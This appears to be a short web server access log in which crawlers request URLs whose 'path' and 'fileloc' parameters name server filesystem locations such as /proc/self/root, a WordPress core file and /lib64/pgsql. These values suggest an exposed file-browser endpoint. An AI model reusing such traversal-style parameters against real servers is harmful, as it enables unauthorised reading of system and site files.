66.249.65.197 - - [01/Nov/2025:09:15:21 -0400] "GET /m081018055?srsltid=AfmBOodjEGEigyzFCp9Tqp_eQmFeDmdLa_PvUgRv0T-F-OWyLK2w63 HTTP/1.1" 200 4149 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
74.7.227.223 - - [01/Nov/2025:09:15:21 -0400] "GET /?path=//proc/self/root/proc/2966092/root/var/softaculous/litecart HTTP/1.1" 200 3650 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.59 - - [01/Nov/2025:09:15:23 -0400] "GET /m029037101?fileloc=/home/creaqbdc/public_html/wp-includes/class-walker-comment.php&path=/home/creaqbdc/public_html/wp-includes HTTP/1.1" 200 5852 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
184.73.239.35 - - [01/Nov/2025:09:15:24 -0400] "GET /holiday-home-transformation-at-tiara-residence-palm-jumeirah/?fileloc=//lib64/pgsql/euc2004_sjis2004.so&path=//lib64/pgsql HTTP/1.1" 200 2953 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
